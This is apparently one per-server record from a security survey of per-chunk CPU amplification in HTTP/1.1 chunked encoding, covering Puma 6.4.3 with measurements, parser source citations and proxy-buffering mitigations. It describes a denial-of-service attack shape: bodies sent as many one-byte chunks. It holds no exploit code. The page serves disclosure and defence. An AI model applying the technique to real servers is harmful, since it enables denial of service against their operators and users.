chunkloris: puma

published: May 22, 2026 β€’

part of the chunkloris per-chunk amplification survey. this page is the per-server record for puma under http/1.1 chunked transfer encoding.

at a glance

  • server: puma 6.4.3
  • runtime: ruby-3.3.11
  • ecosystem: ruby
  • concurrency model: reactor-thread + threaded-workers (8)
  • parser: Puma pure-Ruby chunked decoder (Puma::Client#decode_chunk, lib/puma/client.rb)
  • delivery granularity: fully-buffered-tempfile-to-handler
  • chunk-limit helper: none exposed by the framework
  • verdict: per-chunk β€” the parser/dispatcher boundary delivers one event per wire chunk. cpu cost under paced mode b is measurable per chunk.
  • scaling exponent (mode a): 1.00 (wall time vs N, log-log slope across common cells)

measurements

all cells run on a 1-vcpu docker container. cpu cost is derived from the target container’s cgroup v2 cpu.stat usage_usec delta around each cell.

modeNwall (s)server cpu %Β΅s / chunkbasisok
A-bridge-coalesced50,0000.055152.81.674server-cpu-cgroupβœ“
A-bridge-coalesced100,0000.110128.71.410server-cpu-cgroupβœ“
A-bridge-coalesced250,0000.306β€”1.220wallβœ“
B-paced-100us50,0005.1248.58.702server-cpu-cgroupβœ“
B-paced-100us100,00010.2458.18.271server-cpu-cgroupβœ“
B-paced-100us250,00026.11027.728.900server-cpu-overheadβœ“

parser path β€” source citations

  • chunked-decoder β€” lib/puma/client.rb:526-630 (decode_chunk)
  • reactor-read-loop β€” lib/puma/client.rb:478-501 (read_chunked_body)
  • tempfile-body β€” lib/puma/client.rb:504-517 (setup_chunked_body)

what this means

the parser/dispatcher path on this server delivers one event per chunked-transfer-encoding chunk, so an attacker who sends a body as N one-byte chunks consumes roughly N Γ— (mode-b Β΅s/chunk) of server cpu on a single core. amplification scales linearly with N until the framework’s max_request_body_size (or equivalent) is hit.

what to do today

  • if this server runs as an origin behind nginx with the default proxy_request_buffering on, the per-chunk attack shape does not reach this server β€” nginx delivers one content-length-framed body to the upstream in a single recv().
  • if deployed direct-exposed, behind haproxy with default streaming, or behind any reverse proxy with proxy_request_buffering off, the per-chunk cost reaches this server.
  • there is no framework-level chunk-count limit in the default config; use a frontend buffer, transport-layer rate limiting, or a wrapping middleware that imposes a chunk-count cap before draining the body.

reproducer

the full reproducer for this server is in the paper repo. the docker container pins puma 6.4.3 and constrains the test container to a single cpu (--cpus=1). the prober script implements mode a (bridge-coalesced) and mode b (paced 100 Β΅s) per the methodology section.

see the draft pdf for the full per-framework discussion.

on this page